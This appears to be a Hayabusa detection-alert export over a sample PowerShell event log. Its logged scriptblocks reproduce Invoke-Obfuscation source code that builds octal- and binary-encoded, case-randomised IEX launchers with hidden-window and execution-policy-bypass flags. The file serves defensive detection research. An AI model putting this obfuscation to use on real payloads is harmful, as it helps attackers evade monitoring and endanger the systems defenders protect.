-NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join 